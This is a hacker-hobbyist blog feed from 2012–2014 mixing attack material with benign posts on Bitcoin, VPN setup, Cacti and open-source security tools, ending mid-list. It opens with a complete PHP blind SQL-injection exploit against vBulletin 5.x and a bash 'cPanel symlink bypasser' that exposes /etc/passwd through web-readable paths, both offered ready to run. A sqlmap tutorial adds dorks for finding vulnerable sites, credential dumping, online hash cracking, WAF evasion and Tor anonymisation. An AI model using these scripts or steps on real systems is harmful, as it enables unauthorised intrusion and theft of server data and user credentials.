[+] Wayc0de's Blog[+]

vBulletin 5.x Remote Code Execution Exploit

noreply@blogger.com (d'ZheNwaY) — Fri, 19 Sep 2014 14:40:00 +0700

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Get arguments

$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);

// Function to send a POST request

function httpPost($url,$params)
{
    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));

    $output = curl_exec($ch);

    if($output == FALSE) print htmlspecialchars(curl_error($ch));

    curl_close($ch);
    return $output;
}

// Function to get string between two other strings

function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}

// Get version

print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get user

print "\r\nUser: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get database

print "\r\nDatabase: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

print "\r\n"

?>

Sumber

CPanel Symlink Bypasser

noreply@blogger.com (d'ZheNwaY) — Fri, 19 Sep 2014 14:11:00 +0700

#!/bin/bash

# ______ __ ____ ___

# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /

# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /

# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /

# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/

# /_/ /____/_/

############################################

# CPanel Symlink Bypasser [Public Version] #

# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #

# alm3refh.com © Group XP 2014 #

############################################

# USAGE:

# 1. UPLOAD ME IN /home/user as Cpbypass.sh

# 2. GO TO CRON JOB

# 3. ADD THIS COMMAND:

# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com

# email@gmail.com = your email

# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!

# PS: ENJOY!

##########

# FILE #

##########

SYM="/etc/passwd"

########

echo ""

echo " ______ __ ____ ___"

echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"

echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "

echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "

echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "

echo " /_/ /____/_/ "

echo " CPanel Symlink Bypasser [Public Version]"

echo " By Hannibal Ksa & R3m0t3 Nu11"

echo ""

########

rand=bypass$(( $RANDOM % 10 + 100 ));

###

# 1st 3xpl017

###

ln -sf $SYM tmp/analog/$rand.html

echo ""

echo "1st Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 2nd 3xpl017

###

ln -sf $SYM tmp/webalizer/$rand.html

echo ""

echo "2nd Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 3rd 3xpl017

###

ln -sf $SYM tmp/webalizerftp/$rand.html

echo ""

echo "3rd Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 4th 3xpl017

###

ln -sf $SYM logs/$rand.doc

echo ""

echo "4th Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo ""

echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"

echo ""

# DONE of the public version!

# E0F

Sumber

Listing Website Free Bitcoin Part 1

noreply@blogger.com (d'ZheNwaY) — Fri, 21 Mar 2014 22:51:00 +0700

Free Bitcoin? yah bener sekali

Disini saya akan membagikan beberapa situs yang bisa kita gunakan untuk mendapatkan bitcoin secara gratis. Ada yang harus mengetik captcha ada juga yang harus menunggu beberapa menit atau jam dan lain sebagainya.

So, Cekidot bro !!!

ROLL & DICES

1. http://cur.lv/8f7nz (FreeBitCoinWin) 1 jam untuk 1x ROLL

2. http://cur.lv/8f7px (FreeBitCoin) 1 jam untuk 1x Roll

3. http://cur.lv/8f7qy (BTCFreeGame)

4. http://cur.lv/8f7s1 (999Dice)

5. http://cur.lv/8f8fq (gratisbitco)

6. http://cur.lv/8f8nb (phambit) 1 jam untuk 1x menggambar

sekian dulu info tentang website yang menyediakan bitcoin secara gratis, nantinya bakalan saya share lebih banyak lagi.

regards : Wayc0de

Hackers can steal Whatsapp conversations due to Android security flaw

noreply@blogger.com (d'ZheNwaY) — Thu, 13 Mar 2014 14:17:00 +0700

A SECURITY VULNERABILTIY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.

Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.

The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.

"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.

From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.

Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.

"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.

"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."

The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.

Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.

The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.

While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy

Sumber

How to Use Edward Snowden’s Three Tips for Digital Privacy

noreply@blogger.com (d'ZheNwaY) — Thu, 13 Mar 2014 00:31:00 +0700

Former NSA contractor Edward Snowden says he has been able to outfox U.S. officials using encryption. During a webcast on NSA leaks and data security at the South by Southwest conference in Austin, Texas, Snowden shared some privacy tips for the rest of us: Encrypt your hard drive, use plug-ins for your browser that prevent organizations or companies from tracking you online, and cover your tracks with Tor, an online network that promises anonymity.

These tips range from simple to complicated depending on your computer savvy, so we’ve collected some basic info and guides to help you get started:

Encrypt your hard drive
Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.

Adding password protection to files on your computer is just the first step to personal file security. Encrypting the entire hard disk on your computer ensures personal information is secure, even if your device is stolen or seized.

Newer versions of Windows and Mac operating systems come with built-in disk encryption tools. BitLocker, which encrypts your entire hard drive, comes as part of Windows 7 Ultimate and Enterprise versions, and Windows 8.1 Pro and Enterprise editions. Appleoffer detailed tutorials online on how disk encryption services can be turned on. For those with older operating systems, TrueCrypt, there’s a free program for encrypting your drive. Here’s a guide on how to download and install it.

The Electronic Frontier Foundation, an organization that works on digital rights issues, has a guide to how encryption can help in different situations.

Use browser plug-ins to avoid being tracked onlineThe Wall Street Journal’s series ‘What They Know‘ showed companies are using digital tracking for online activities such as shopping, varying prices based on shopping patterns and location information. While that may seem harmless, it’s important to know that if retailers can see you, it’s likely that others can as well.

Slowly, companies such as Google have agreed to support a do-not-track button to be embedded in most Web browsers. Google’s Chrome browser has a setting that most users can turn on to send a do-not-track request, and so does Microsoft’s Internet Explorer 10. They won’t work with all websites, but it’s a good place to begin.

Plug-ins or small software extensions available for browsers are another way to go about it. Ghostery, a plug-in available for most popular browsers, when installed will show the number of trackers detected but not automatically block them. Users have the choice to individually or in bulk block these trackers.

You can also choose sites, such as the search engine DuckDuckGo, which do not record or share your searches.

Cover your tracks with Tor Over the last few months, Tor, a network that promises anonymity and privacy online has come under the spotlight. Tor hosts a network of websites, some of which have been under the scanner of law enforcement officials for illegal activities. Late last year, the Federal Bureau of Investigation shut down Silk Road, a marketplace available only through the Tor network, for the sale of illegal drugs.

Tor may be useful for criminals, but its cloak of anonymity is increasingly a comfort to anyone looking for privacy. Tor offers its own browser that can be used to connect to news sites or instant messaging services and chat rooms that can’t be easily tracked online.

To get started on the Tor network, take the advice of the ExtremeTech blog, and download the Tor Browser Bundle available for Windows, Mac and Linux. It’s similar to using the Firefox or Chrome browser but slower, because Internet traffic is routed through a series of proxies to mask its origin.

Other ways to lower your online profile include using encrypted chat services such as SilentCircle, and encrypted mail such as Hushmail. There are even smartphones coming out soon that will offer a suite of privacy features baked right in.

Sumber

Playing with SQL Injection and Firewall Bypassing

noreply@blogger.com (d'ZheNwaY) — Mon, 10 Mar 2014 23:39:00 +0700

Playing with SQL Injection and Firewall Bypassing

Disclaimer: This article is only for educational purposes, security researchers, and pentester. I would like to clarify that I am completely against cyber-crime.

ABSTRACT

Most cyber-attacks in the world that involve websites occurs due to lack of updates and configuration faults resulting in explorations of success.

One of the main threats is SQL Injection that left many worried about their systems, programmers, and SQL databases.

The biggest problem is not the DBMS itself but the lack of definition and verification of the input fields in web applications.

CONTEXT

Many web developers do not know how SQL queries can be handled and assume that an SQL query is a trusted command. This allows for SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. And sometimes SQL queries even may allow access to the command shell on the server operating system level.

Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data or to override valuable data, and even to execute dangerous system level commands on the server.

INTRODUCTION

Structured Query Language is the standard declarative language for relational databases. This allows for its simplicity and ease of use.

SQL was originally developed in the early 70s at IBM labs.

SQLMAP is a tool used for this type of vulnerability.

It is Open source, and often is used for Penetration Testing that enable intrusions on fragile DBMS written in Python. It provides functions to detect and exploit vulnerabilities of SQLI. Let's use the example sqlmap.py, widely used in operating systems and databases.

STEP BY STEP

Readers I will try to explain this in the simplest possible way.

You must have a vulnerable target, to find out if the target is vulnerable just input ' at the end of the URL being tested and press "Enter" if some error is returned the database is vulnerable.

You can use google to find it with some dork. Example: inurl: news.php id = 1?

There is a bank of google dorks data and several other possibilities that can be used to filter your search.

cd /pentest/database/sqlmap

We will now begin the game, to view the menu for sqlmap.py use the command ./sqlmap.py -h

Let's run sqlmap.py, the parameter [--dbs], to search the all databases in DBMS.

Or use the parameter --current-db to show the databases that are being used.

The parameter -D is for the target of database and --tables is tables list.

We will verify the existence of interesting information in the table (admin_users), time to list the columns. The parameter is –columns.

It is important to always indicate the target database (-D) data before listing the tables because if you do not do this (without the -D) it will list all tables in all databases.

-T = target table

-C = target columns, can be more than one column to be chosen. Example: username, password.

--dump = obtain, extract data.

Important to remember the parameter --proxy: enables use of proxy.

Example: /sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy=http://183.223.10.108:80

Readers, I think that's the basics for beginners. sqlmap.py also has many interesting functions, I suggest researching about --prefix=PREFIX, --postfix=POSTFIX and takeover options.

More information about the program and videos of them in action on the official site.

--dump is to extract the data from the site but is not given any, this must be within the selected column, and you have to choosen what to extract from the column, where I extracted the logins and passwords are saved within the column.

Generally, the field of "passwords" DBMS are encrypted.

We then need to decrypt the passwords in order to access the target system.

We can find a way to log into the system. But wait, the passwords are encrypted in MD5, hahahaha put your hash on:http://www.md5decrypt.org and may be decrypted or otherwise

https://crackstation.net/ http://www.onlinehashcrack.com/

BEYOND THE BASICS

Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

In fact the function of the tamper scripts is to modify the request in a way that will escape detection rules WAF (Web Application Firewall). In some cases it may be necessary to combine some tamper scripts together in order to fool the WAF. For a complete list of scripts for tampering, you may find https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

Many enterprises often overlook the current vulnerabilities and rely only on the firewall for protection. Unfortunately, most, if not all firewalls can be bypassed. So gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAF’s/IDS.

Well, I'll demonstrate some important scripts that are charencode.py and charcodeencode.py to work with MySQL.

Hands-on: To begin using tamper scripts, you use the --tamper followed by the script name. In the example, we use the command:

Summary of charencode.py

Quite simply, this script is useful for ignoring very weak web application firewalls (WAF) …

Another interesting function url-decode the request before processing it through their set of rules (:

The web server will anyway go to url-decoded back version, concluding, it should work against any DBMS.

Example to use:

We will demonstrate the use of charunicodeencode.py for additional security. The vast number of organizations have deployed WAF. Guys, this is a tricky part to exploit such an environment. Well, standard SQL injection attack vectors will not work neither will the scripts.

That is the reason we use tamper scripts, this facility known as “tamper scripts" in aid of a quiet way to bypass web application firewalls.

Guys, I have demonstrated just a few of the many tamper scripts. We highly recommend testing them out as each one can be used in different situations.

Notes: That's not a tool for "script kiddies" it is of utmost importance to make use of such a powerful tool responsibly and maturely.

Caution if used in the wrong way, sqlmap generates many queries and can affect the performance of the database target, moreover strange entries and changes to the database schema are possible if the tool is not controlled and used extensively.

PARTLY ANONYMOUS

I will demonstrate to you how to use sqlmap with The Onion Router for the protection of IP, DNS, etc... In your Linux, in the terminal type:

$ sudo apt-get install tor tor-geoip

After enter the sqlmap folder and type:

./sqlmap.py -u "http://www.targetvuln.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

The argument --tor invokes the Tor to be used and the --check-tor checks if Tor is being used properly, if not, you will receive an error message in red at the terminal. The User Agent is the googlebot, all your requests on the site will look like the Google bot doing a little visit.

TOR at SQLMap, we can set your TOR proxy for hiding the source from where the traffic or request is generated.

–tor-port, –tor-type : the parameter can help you out to set the TOR proxy manually.

–check-tor : the parameter will check if the tor setup is appropriate and functional.

CONCLUSION:

It is known that many targets have been explored through SQL Injection a few years ago when this threat was discovered, the injection form was "the nail". The pentester had to enter the codes manually, taking longer to complete the attack.

Then came the development of programs that automated attack. Nowadays perhaps the best known of these programs is sqlmap.py. SQLMAP is a program of open source testing framework written in Python. It has full support for database systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and also supports 6 types of SQL Injection techniques.

SOLUTION:

1. Correct the SQL server regularly.

2. Limit the use of dynamic queries.

3. Escape input data from users.

4. Stores the credentials of the database in a separate file.

5. Use the principle of least privilege.

6. Turn off the magic quotes.

7. Disable shell access.

8. Disable any feature of the bank that you do not need

9. Test your code

10. Search in google advanced techniques to correct this vulnerability.

Sumber

Rincian Nilai Bitcoin

noreply@blogger.com (d'ZheNwaY) — Mon, 10 Mar 2014 21:37:00 +0700

Bitcoin terdiri dari 8 angka 0 yaitu 0.00000000 yang urutan nilainya seperti
0.00000001 BTC = 1 satoshi
0.0000001 BTC = 10 satoshi
0.000001 BTC = 1 uBTC (micro)
0.00001 BTC = 10 uBTC
0.0001 BTC = 100 uBTC
0.001 BTC = 1 mBTC (milli)
0.01 BTC = 10 mBTC
0.1 BTC = 100 mBTC
1 BTC = 1 BTC
10 BTC = 10 BTC
100 BTC = 100 BTC
1.000 BTC = 1 kBTC (kilo)
10.000 BTC = 10 kBTC
100.000 BTC = 100 kBTC
1.000.000 BTC = 1 MBTC (mega)
10.000.000 BTC = 10 MBTC

Bitcoin

noreply@blogger.com (d'ZheNwaY) — Sat, 22 Feb 2014 13:43:00 +0700

Bitcoin adalah sebuah uang elektronik yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak sumber terbuka yang dia rancang, dan juga menggunakan jaringan peer-ke-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah database yang didistribusikan dan menyebar ke node-node dari sebuah jaringan P2P ke jurnal transaksi, dan menggunakan kriptografi untuk menyediakan fungsi-fungsi keamanan dasar, seperti memastikan bahwa bitcoin-bitcoin hanya dapat dihabiskan oleh orang mempunyainya, dan tidak pernah boleh dilakukan lebih dari satu kali.

Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat disimpan di komputer pribadi dalam sebuah format file wallet atau di simpan oleh sebuah servis wallet pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah alamat Bitcoin. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan inflasi dengan memproduksi lebih banyak bitcoin.

Bitcoin adalah salah satu dari implementasi pertama dari yang disebut cryptocurrency, pertama kali di deskripsikan oleh Wei Dai pada tahun 1998 dalam milis cypherpunks

Sumber

Fimap Tool - Local And Remote File Inclusion With Backbox Linux

noreply@blogger.com (d'ZheNwaY) — Wed, 26 Sep 2012 22:55:00 +0700

Description: LFI ATTACK WITH FIMAP, target DVWA, arm BACKBOX LINUX.

First you need to install DVWA*, then run Apache server (comes with BackBox Linux), then read how to use FIMAP (terminal fimap -h), one c99 shell script (to find one type inurl:c99.txt in Google search box).You will need to set Apache directory permissions, for this you can use this bash script : http://www.linux.re.rs/files/scripts/dirbash.sh. I will show you how to upload shell to vulnerable server and exploit the vulnerability.

* How to install DVWA with BackBox Linux !

http://www.anonimus.re.rs/6562

Author : Nenad Marjanovic
IT nick : ZEROF
Author site : http://www.pentester.iz.rs

Urlcrazy Tool On Backtrack 5 R3

noreply@blogger.com (d'ZheNwaY) — Tue, 25 Sep 2012 19:35:00 +0700

Description: URLCrazy is a tool that can generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. It generates 15 types of domain variants, knows over 8000 common misspellings, supports multiple keyboard layouts, can check if a typo is a valid domain, tests if domain typos are in use, and estimates the popularity of a typo.

Sumber

Vega Web Scanner On Backtrack 5 R3

noreply@blogger.com (d'ZheNwaY) — Tue, 25 Sep 2012 19:14:00 +0700

Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Sumber

Tab-Nabbing With Dns Spoofing Using Backtrack

noreply@blogger.com (d'ZheNwaY) — Sun, 23 Sep 2012 11:33:00 +0700

Description: In this Tutorial I have Explained how to use SET ( Social Engineering tool kit) for Tab nabbing and DNS Spoofing using Ettercap to make it more effective in LAN.......

In next tutorial I will Explain How to do it using port 443 of attacker machine instead of using port 80. So that even if victim type https://url instead of http then also he/she get attacked.

Sumber

[Tutor] Setting PPTP pada Linux

noreply@blogger.com (d'ZheNwaY) — Sun, 23 Sep 2012 10:38:00 +0700

Assalamu'alaikum Wr Wb

kalian semua pasti tau VPN,,dimana kita bisa surfing di dunia maya tanpa ketahuan IP asli kita

kemaren ane ada problem ketika selesai order VPN, dimana VPN tersebut tidak support untuk linux

setelah ane browsing, ternyata type yg support untuk linux itu PPTP.

apa itu PPTP? bisa kalian cari sendiri definisinya dari google

oke langsung aja biar gak lama

CEKIDOT !!!

1. Pertama kita cek terlebih dahulu IP kita sebelum memakai PPTP

2. Masuk ke menu System -- > Preferences --> Network Connections

3. Masuk ke menu VPN --> Add --> Pilih Point to Point Tunneling Protocol (PPTP) --> klik Create

4. a. Isi Connection Name dengan nama VPN kita
b. Isi Gateway server VPN kita
c. Isi Username beserta Passwordnya

5. Setelah itu klik menu Advanced yang ada dibawah pojok kanan, dan centang pada bagian Use Point to Point Encryption (MPPE) kemudian klik OK

6. Setelah semua dipastikan benar sekarang klik Apply

7. Jika semua tahap diatas sudah benar, maka secara otomatis VPN akan keluar dengan sendiri

8. Untuk menggunakan PPTP bisa langsung klik gambar Sinyal yang ada di pojok kanan atas, kemudian masuk ke menu VPN Connections. Nantinya disana akan keluar nama VPN yang kita tulis pada step ke 4. Tinggal klik aja pada nama VPN yang keluar dan tunggu beberapa saat maka simbol sinyal akan ada gambar gemboknya

9. Setelah ada gambar gembok kita coba cek IP kita setelah memakai VPN PPTP

yups selamat VPN kalian sudah bekerja dengan baik

untuk mengganti server, bisa kita edit di bagian Gateway-nya

sekarang kita bisa surfing di dunia maya dengan aman dan terkendali

mungkin sekian dulu dari ane, klo ada salah mohon maaf yang sebesar-besarnya

semoga bermanfaat untuk semuanya

Wassalamu'alaikum Wr Wb

Sumber

Install Cacti di Ubuntu

noreply@blogger.com (d'ZheNwaY) — Sun, 23 Sep 2012 10:28:00 +0700

Assalamu'alaikum Wr Wb

sebenarnya klo di cari google udah banyak untuk tutorialnya, tapi gak ada salahnya kn ane share disini

pertama-tama kita cari tau apa itu cacti??

Cacti adalah sebuah network monitoring grafis berbasis rrdtool, umumnya digunakan untuk memantau link dan pemakaian bandwidth. Software ini berjalan baik di keluarga nix, termasuk linux dan Unix, dan windows.

oke sekarang masuk ke tahap instalasi

1. Masuk ke Terminal dan login sebagai root kemudian ketikkan command berikut ini

root@hacker:/# apt-get install cacti-cactid

2. Configure libphp-adodb

Jika muncul configurasi tersebut, maka tekan Enter ( OK )

3. Configure dbase for cacti

Konfigurasi dbase cacti dengan dbconfig-common, maka dijawab “YES”.

4. Configuring Cacti

a. Isikan password root sql kalian (Jangan Sampai Lupa)

b. Isikan password root sql untuk cacti

c. confirm cacti sql password yang tadi kalian buat

d. Pemilihan aplikasi webserver (Pilih Yang Apache2)

5. Proses Installasi ( Installation Guide )

-Akses ip cacti dengan alamat http://localhost/cacti

-Pilih new installation, kemudian tekan NEXT

-Klik Finish untuk mengakhiri installasi cacti

6. Login ke dalam cacti
buka browser dan akses ke http://localhost/cacti

7. Penampakan halaman depan cacti kita

8. Dan sekarang kita bisa melihat aktifitas CPU kita di menu graph

taaraaaaaa..cacti udah berjalan di laptop/PC kita

untuk selanjutnya silahkan di utak-atik sendiri ea
maklum ane juga masih belajar tentang cacti
semoga artikel cupu ini bermanfaat buat kita semua

Wassalamu'alaikum Wr Wb

Sumber

Proxy Checker

noreply@blogger.com (d'ZheNwaY) — Sun, 23 Sep 2012 10:15:00 +0700

Assalamu'alaikum Wr Wb

sesuai dengan judulnya,,ane yakin kalian semua tau gmn ending cerita

CEKIDOT !!!

1. Download dulu tool proxy checkernya Proxy Checker

2. Punya list proxy yang mau di cek,, kalau males ngumpulin
nie ane sudah sediain beberapa list proxy yang ane dapet dari segala sumber terpercaya

Download disini ea Gays List Proxy

3. Setelah 2 hal diatas siap,,selanjutnya kita coba jalanin tool checkernya
ketika ada tulisan "Enter Your Proxy Lists" isi aja nama folder proxy list ente
dan selanjutnya bisa di isi sesuai dengan gambar dibawah ini

4. Setelah itu maka kita tinggal tunggu hasilnya aja gays

5. Ketika aksi checkernya sudah selesai,, saatnya kita tes satu-persatu dari hasil checker proxy tersebut. Hasilnya sudah automatis berbentuk .txt dengan nama file works.txt

mungkin sekian dulu acara berbagi
semoga bermanfaat untuk kita semua

akhirnya kata, Wassalamu'alaikum Wr Wb

Sumber

65 Open Source Replacements for Security Software

noreply@blogger.com (d'ZheNwaY) — Sun, 23 Sep 2012 10:05:00 +0700

Assalamu'alaikum Wr Wb

sudah lama saya tidak membikin postingan di blog ini, akhirnya hari ini ada niat buat ngisi lagi

CEKIDOT !!!

=============================================================

Anti-Spam

1. ASSP

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

The self-proclaimed "absolute best SPAM fighting weapon that the world has ever known," ASSP sits on your SMTP servers to stop spam and scan for viruses. Features include browser-based setup, support for most SMTP servers, automatic whitelists, early sender verification, Bayesian filters and more. Operating System: OS Independent.

2. MailScanner

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

Downloaded more than 1.3 million times by users in 225 countries, MailScanner is a free e-mail security package for mail servers. It incorporates SpamAssassin, ClamAV and a number of other tools to block spam and malware. Operating System: OS Independent.

3. SpamAssasin

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

"The powerful #1 open-source spam filter," SpamAssassin uses header and text analysis, Bayesian filtering, DNS blocklists, collaborative filtering databases and other techniques to block spam. The project is managed by the Apache Foundation, and it's been incorporated into a number of other open source and commercial products. Operating System: primarily Linux and OS X, although Windows versions are available.

4. SpamBayes

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

As you might guess from the name, this project offers a group of Bayesian filters for blocking spam. The site includes versions for Outlook, Outlook Express, Windows Live Mail, IncrediMail, Thunderbird, Gmail, Yahoo Mail and others. Operating System: OS Independent.

Anti-Spyware

5. Nixory
Replaces: SpyBot Search and Destroy, AdAware

Nixory removes and block malicious tracking cookies (aka, spyware) from your system. It supports Mozilla Firefox, Internet Explorer and Google Chrome, and it won't slow your system while you surf. Operating System: OS Independent.

Anti-Virus/Anti-Malware

6. ClamAV

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

This tremendously popular anti-virus engine has been incorporated into numerous security products and calls itself "the de facto standard for mail gateway scanning." The open source version runs on UNIX or Linux mail servers, but the website also offers a version called Immunetfor individual Windows PCs. Operating System: Linux.

7. ClamTK

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

ClamTK makes ClamAV a little bit easier to use by providing a graphical interface for the anti-virus engine. Like the original, this one runs on Linux and scans on demand. Operating System: Linux.

8. ClamWin Free AntiVirus

Replaces Kaspersky Anti-Virus, McAfee AntiVirus Plus, Norton Anti-Virus

